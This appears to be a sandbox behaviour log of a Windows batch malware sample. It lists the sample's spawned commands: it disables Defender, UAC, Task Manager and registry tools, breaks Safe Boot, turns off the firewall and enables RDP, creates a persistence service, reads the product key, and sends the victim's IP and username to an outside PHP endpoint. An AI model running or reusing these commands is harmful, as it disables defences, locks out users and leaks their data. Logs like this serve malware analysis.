reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoExplorer /t REG_DWORD /d 1 /f
2⤵
- Modifies data under HKEY_USERS
PID:6080

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "EnableScripts" /t REG_DWORD /d 0 /f
2⤵
PID:2444

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "ExecutionPolicy" /t REG_SZ /d "Restricted" /f
2⤵
PID:4140

C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AlternateShell" /ve /d "Empty" /f
2⤵
PID:4200

C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal" /ve /d "Empty" /f
2⤵
PID:5140

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f
2⤵
- Modifies data under HKEY_USERS
PID:4712

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f
2⤵
- Modifies data under HKEY_USERS
PID:5608

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ipconfig | findstr IPv4
2⤵
PID:5612

C:\Windows\system32\ipconfig.exe
ipconfig
3⤵
- Gathers network information
PID:5644

C:\Windows\system32\findstr.exe
findstr IPv4
3⤵
PID:4716

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c whoami
2⤵
PID:5320

C:\Windows\system32\whoami.exe
whoami
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5952

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net user "YCLEXTAL$"
2⤵
PID:6096

C:\Windows\system32\net.exe
net user "YCLEXTAL$"
3⤵
PID:2444

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32\notepad.exe"
2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:5288

C:\Windows\system32\icacls.exe
icacls "C:\Windows\System32\notepad.exe" /deny Everyone:(RX)
2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5336

C:\Windows\system32\manage-bde.exe
manage-bde -off C:
2⤵
PID:5348

C:\Windows\system32\manage-bde.exe
manage-bde -on C: -exclude "C:\Windows" -exclude "C:\Users" -exclude "C:\Program Files" -exclude "C:\Program Files (x86)"
2⤵
PID:5512

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled yes
2⤵
- Modifies boot configuration data using bcdedit
PID:5820

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
2⤵
- Modifies boot configuration data using bcdedit
PID:4808

C:\Windows\system32\sc.exe
sc create MiServicio binPath= "C:\Users\Admin\AppData\Local\Temp\malware.bat" start= auto obj= "LocalSystem" DisplayName= "Mi Servicio"
2⤵
- Launches sc.exe
PID:5672

C:\Windows\system32\net.exe
net start MiServicio
2⤵
PID:3800

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start MiServicio
3⤵
PID:5752

C:\Windows\system32\takeown.exe
takeown /F "C:\Windows\system32\WindowsPowerShell\v1.0\powershell_ise.exe"
2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3328

C:\Windows\system32\icacls.exe
icacls "C:\Windows\system32\WindowsPowerShell\v1.0\powershell_ise.exe" /grant administrators:F
2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2440

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
PID:5936

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:5732

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
PID:4192

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\malware.bat" "
1⤵
PID:2604

C:\Windows\system32\net.exe
net session
2⤵
PID:1820

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
3⤵
PID:2212

C:\Windows\system32\powercfg.exe
powercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4968

C:\Windows\system32\powercfg.exe
powercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3960

C:\Windows\system32\powercfg.exe
powercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:6108

C:\Windows\system32\powercfg.exe
powercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:884

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Allow RDP" dir=in action=allow protocol=TCP localport=3389
2⤵
- Modifies Windows Firewall
PID:4920

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Allow Ping" dir=in action=allow protocol=ICMPv4
2⤵
- Modifies Windows Firewall
PID:5444

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Allow Outbound" dir=out action=allow
2⤵
- Modifies Windows Firewall
PID:3104

C:\Windows\system32\netsh.exe
netsh advfirewall firewall set rule group="Remote Desktop" new enable=Yes
2⤵
- Modifies Windows Firewall
PID:3672

C:\Windows\system32\netsh.exe
netsh advfirewall set allprofiles state off
2⤵
- Modifies Windows Firewall
PID:5184

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
2⤵
PID:4568

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowRemoteRPC /t REG_DWORD /d 1 /f
2⤵
PID:1228

C:\Windows\system32\reg.exe
REG IMPORT "C:\Users\Admin\AppData\Local\Temp\disable_winload.reg"
2⤵
PID:2656

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoManageMyComputerVerb /t REG_DWORD /d 1 /f
2⤵
PID:320

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCached" /f
2⤵
PID:1536

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCache" /f
2⤵
PID:1496

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0c09" /t REG_SZ /d "en-US" /f
2⤵
PID:2436

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0419" /t REG_SZ /d "ru-RU" /f
2⤵
PID:5200

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCache" /v "en-US" /t REG_SZ /d "0c09" /f
2⤵
PID:2800

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCache" /v "ru-RU" /t REG_SZ /d "0419" /f
2⤵
PID:5332

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
2⤵
PID:5628

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
2⤵
PID:5604

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v DisableSettingsPage /t REG_DWORD /d 1 /f
2⤵
PID:5516

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop" /v PreferredUILanguages /t REG_MULTI_SZ /d ru-RU /f
2⤵
PID:5716

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\International" /v sLanguage /t REG_SZ /d rus /f
2⤵
PID:5772

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
2⤵
PID:4216

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
2⤵
PID:5556

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
2⤵
PID:5812

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
2⤵
PID:2892

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
2⤵
PID:5844

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
2⤵
PID:3132

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoExplorer /t REG_DWORD /d 1 /f
2⤵
PID:2000

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "EnableScripts" /t REG_DWORD /d 0 /f
2⤵
PID:5704

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "ExecutionPolicy" /t REG_SZ /d "Restricted" /f
2⤵
PID:3836

C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AlternateShell" /ve /d "Empty" /f
2⤵
PID:5804

C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal" /ve /d "Empty" /f
2⤵
PID:5304

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f
2⤵
PID:3852

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f
2⤵
PID:5572

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ipconfig | findstr IPv4
2⤵
PID:5152

C:\Windows\system32\ipconfig.exe
ipconfig
3⤵
- Gathers network information
PID:5532

C:\Windows\system32\findstr.exe
findstr IPv4
3⤵
PID:5148

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.perfect.wuaze.com/guardar_ip.php?id=10.127.0.216
2⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5964

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcb89146f8,0x7ffcb8914708,0x7ffcb8914718
3⤵
PID:4648

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2208,16598863121212721623,12939822433115313720,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2268 /prefetch:2
3⤵
PID:1328

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2208,16598863121212721623,12939822433115313720,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2344 /prefetch:3
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2396

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2208,16598863121212721623,12939822433115313720,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2968 /prefetch:8
3⤵
PID:5492

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,16598863121212721623,12939822433115313720,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:1
3⤵
PID:5008

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,16598863121212721623,12939822433115313720,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1
3⤵
PID:2748

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2208,16598863121212721623,12939822433115313720,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5112 /prefetch:8
3⤵
PID:380

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2208,16598863121212721623,12939822433115313720,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5112 /prefetch:8
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4468

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,16598863121212721623,12939822433115313720,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5220 /prefetch:1
3⤵
PID:1668

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,16598863121212721623,12939822433115313720,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5184 /prefetch:1
3⤵
PID:4436

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,16598863121212721623,12939822433115313720,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5136 /prefetch:1
3⤵
PID:3960

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,16598863121212721623,12939822433115313720,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4060 /prefetch:1
3⤵
PID:1904

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,16598863121212721623,12939822433115313720,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5400 /prefetch:1
3⤵
PID:2412

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,16598863121212721623,12939822433115313720,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5644 /prefetch:1
3⤵
PID:5320

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,16598863121212721623,12939822433115313720,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5864 /prefetch:1
3⤵
PID:4848

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c whoami
2⤵
PID:4432

C:\Windows\system32\whoami.exe
whoami
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5868

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://perfect.wuaze.com/guardar_ip.php?id=admin123
2⤵
PID:1244

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcb89146f8,0x7ffcb8914708,0x7ffcb8914718
3⤵
PID:4836

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://perfect.wuaze.com/guardar_ip.php?id=yclextal\admin
2⤵
PID:1536

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0x40,0x104,0x7ffcb89146f8,0x7ffcb8914708,0x7ffcb8914718
3⤵
PID:4844

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net user "Admin"
2⤵
PID:2064

C:\Windows\system32\net.exe
net user "Admin"
3⤵
PID:2016

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user "Admin"
4⤵
PID:928

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32\notepad.exe"
2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:5840

C:\Windows\system32\icacls.exe
icacls "C:\Windows\System32\notepad.exe" /deny Everyone:(RX)
2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5804

C:\Windows\system32\manage-bde.exe
manage-bde -off C:
2⤵
PID:3164

C:\Windows\system32\manage-bde.exe
manage-bde -on C: -exclude "C:\Windows" -exclude "C:\Users" -exclude "C:\Program Files" -exclude "C:\Program Files (x86)"
2⤵
PID:5108

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled yes
2⤵
- Modifies boot configuration data using bcdedit
PID:5148

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
2⤵
- Modifies boot configuration data using bcdedit
PID:5880

C:\Windows\system32\sc.exe
sc create MiServicio binPath= "C:\Users\Admin\AppData\Local\Temp\malware.bat" start= auto obj= "LocalSystem" DisplayName= "Mi Servicio"
2⤵
- Launches sc.exe
PID:5232

C:\Windows\system32\net.exe
net start MiServicio
2⤵
PID:3520

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start MiServicio
3⤵
PID:780

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /v "BackupProductKeyDefault" 2>nul | find "BackupProductKeyDefault"
2⤵
PID:5476

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /v "BackupProductKeyDefault"
3⤵
PID:5772

C:\Windows\system32\find.exe
find "BackupProductKeyDefault"
3⤵
PID:1472

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.perfect.wuaze.com/guardar_ip.php?id=
2⤵
PID:5588

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcb89146f8,0x7ffcb8914708,0x7ffcb8914718
3⤵
PID:5140

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4556

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5896

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\malware.bat
1⤵
- Modifies data under HKEY_USERS
PID:2556

C:\Windows\system32\net.exe
net session
2⤵
PID:3080

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
3⤵
PID:5972

C:\Windows\system32\powercfg.exe
powercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:5660

C:\Windows\system32\powercfg.exe
powercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4796

C:\Windows\system32\powercfg.exe
powercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4556

C:\Windows\system32\powercfg.exe
powercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:764

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Allow RDP" dir=in action=allow protocol=TCP localport=3389
2⤵
- Modifies Windows Firewall
PID:5848

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Allow Ping" dir=in action=allow protocol=ICMPv4
2⤵
- Modifies Windows Firewall
PID:5624

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Allow Outbound" dir=out action=allow
2⤵
- Modifies Windows Firewall
PID:4932

C:\Windows\system32\netsh.exe
netsh advfirewall firewall set rule group="Remote Desktop" new enable=Yes
2⤵
- Modifies Windows Firewall
- Modifies data under HKEY_USERS
PID:5520

C:\Windows\system32\netsh.exe
netsh advfirewall set allprofiles state off
2⤵
- Modifies Windows Firewall
PID:2412

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
2⤵
PID:5756

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowRemoteRPC /t REG_DWORD /d 1 /f
2⤵
PID:996

C:\Windows\system32\reg.exe
REG IMPORT "C:\Windows\TEMP\disable_winload.reg"
2⤵
PID:4968

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoManageMyComputerVerb /t REG_DWORD /d 1 /f
2⤵
PID:6032

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCached" /f
2⤵
PID:5588

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCache" /f
2⤵
PID:1216

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0c09" /t REG_SZ /d "en-US" /f
2⤵
PID:676

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0419" /t REG_SZ /d "ru-RU" /f
2⤵
PID:5304

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCache" /v "en-US" /t REG_SZ /d "0c09" /f
2⤵
PID:4932

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCache" /v "ru-RU" /t REG_SZ /d "0419" /f
2⤵
PID:708

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
2⤵
PID:4924

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
2⤵
PID:5500

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v DisableSettingsPage /t REG_DWORD /d 1 /f
2⤵
PID:2216

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop" /v PreferredUILanguages /t REG_MULTI_SZ /d ru-RU /f
2⤵
PID:2444

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\International" /v sLanguage /t REG_SZ /d rus /f
2⤵
PID:4968

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
2⤵
PID:5476

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
2⤵
PID:4452

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
2⤵
PID:5776

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:1216

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
2⤵
PID:5600

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
2⤵
PID:1480

C:\Windows\system32\reg.exe
